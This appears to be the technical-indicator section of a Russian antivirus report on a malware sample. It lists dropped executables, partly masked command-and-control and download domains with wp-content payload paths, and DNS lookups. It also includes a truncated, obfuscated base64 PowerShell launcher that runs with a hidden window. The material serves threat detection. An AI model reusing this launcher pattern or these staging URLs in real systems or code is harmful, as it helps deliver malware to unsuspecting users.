Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAG8AUQBBAEMAbwBBAEEAPQAoACgAJwBqACcAKwAnADEAQwAnACkAKwAnAFgAJwArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBHADEAJwAsACcAQQBBACcAKQApADsAJABoAEEAMQBRAFEAQwBRAEIAIAA9ACAAKAAnADgAMgAnACsAJwA...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1512
- %TEMP%\931653.cvr
- %HOMEPATH%\820.exe
- %HOMEPATH%\820.exe
- 'pr###min.com':443
- 'ch###enxu.com':80
- 'ei##v.org':80
- 'ei##v.org':443
- http://ch###enxu.com/wp-content/KH_z/
- http://www.ch###enxu.com/wp-content/KH_z/
- http://ei##v.org/wp-content/2_A/
- 'pr###min.com':443
- 'ei##v.org':443
- DNS ASK pr###min.com
- DNS ASK mo###blog.com
- DNS ASK ch###enxu.com
- DNS ASK gl###lent.pk
- DNS ASK ei##v.org
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABzAG8AUQBBAEMAbwBBAEEAPQAoACgAJwBqACcAKwAnADEAQwAnACkAKwAnAFgAJwArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwBHADEAJwAsACcAQQBBACcAKQApADsAJABoAEEAMQBRAFEAQwBRAEIAIAA9ACAAKAAnADgAMgAnACsAJwA...' (со скрытым окном)